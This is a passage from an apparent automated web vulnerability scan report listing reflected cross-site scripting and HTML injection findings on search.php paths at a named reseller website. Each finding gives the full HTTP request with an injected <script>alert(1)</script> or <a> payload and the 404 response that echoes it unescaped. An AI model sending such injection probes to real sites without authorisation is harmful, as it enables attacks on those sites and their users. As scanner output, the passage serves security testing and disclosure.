This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/images/rating/search.php?keyword=search...1ebcc<a>c07ca99d563&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating/search.php?keyword=search...1ebcc<a>c07ca99d563&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2963. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fba11<script>alert(1)</script>3d592e4295a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&fba11<script>alert(1)</script>3d592e4295a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&fba11<script>alert(1)</script>3d592e4295a=1 was not found on this server.</p>
...[SNIP]...

2.2964. http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload eac61<a>98768da333d was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2eac61<a>98768da333d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2eac61<a>98768da333d was not found on this server.</p>
...[SNIP]...

2.2965. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fec15<script>alert(1)</script>e7995665714 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfec15<script>alert(1)</script>e7995665714/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfec15<script>alert(1)</script>e7995665714/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2966. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 340fa<script>alert(1)</script>10710d56ac3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41340fa<script>alert(1)</script>10710d56ac3/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41340fa<script>alert(1)</script>10710d56ac3/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2967. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cd233<script>alert(1)</script>ae18e2a8fc2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themescd233<script>alert(1)</script>ae18e2a8fc2/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themescd233<script>alert(1)</script>ae18e2a8fc2/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2968. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3b7f0<script>alert(1)</script>9bbb11a5747 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos3b7f0<script>alert(1)</script>9bbb11a5747/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos3b7f0<script>alert(1)</script>9bbb11a5747/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2969. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 72a07<script>alert(1)</script>a237b44b2c6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images72a07<script>alert(1)</script>a237b44b2c6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images72a07<script>alert(1)</script>a237b44b2c6/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2970. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 45dc8<script>alert(1)</script>6447f3a1b2b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/search.php45dc8<script>alert(1)</script>6447f3a1b2b?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/search.php45dc8<script>alert(1)</script>6447f3a1b2b?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2971. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e2ee3<a>c7738e9a554 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche2ee3<a>c7738e9a554&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche2ee3<a>c7738e9a554&opt=2 was not found on this server.</p>
...[SNIP]...

2.2972. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7388c<a>f3ba16fca91 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/images/search.php?keyword=search...7388c<a>f3ba16fca91&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/search.php?keyword=search...7388c<a>f3ba16fca91&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2973. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1daa2<script>alert(1)</script>8626d619202 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&1daa2<script>alert(1)</script>8626d619202=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&1daa2<script>alert(1)</script>8626d619202=1 was not found on this server.</p>
...[SNIP]...

2.2974. http://www.resellerbase.com/detail/41/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 38efb<a>44779053653 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=238efb<a>44779053653 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=238efb<a>44779053653 was not found on this server.</p>
...[SNIP]...

2.2975. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fcac5<script>alert(1)</script>adf595f10b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfcac5<script>alert(1)</script>adf595f10b7/41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfcac5<script>alert(1)</script>adf595f10b7/41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2976. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e7021<script>alert(1)</script>f2346cf5b75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41e7021<script>alert(1)</script>f2346cf5b75/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41e7021<script>alert(1)</script>f2346cf5b75/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2977. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 62079<script>alert(1)</script>56c6b6a0845 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes62079<script>alert(1)</script>56c6b6a0845/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes62079<script>alert(1)</script>56c6b6a0845/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2978. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 304bb<script>alert(1)</script>69609dc9298 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos304bb<script>alert(1)</script>69609dc9298/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos304bb<script>alert(1)</script>69609dc9298/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2979. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d038f<script>alert(1)</script>eff29015fdb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/search.phpd038f<script>alert(1)</script>eff29015fdb?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/search.phpd038f<script>alert(1)</script>eff29015fdb?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

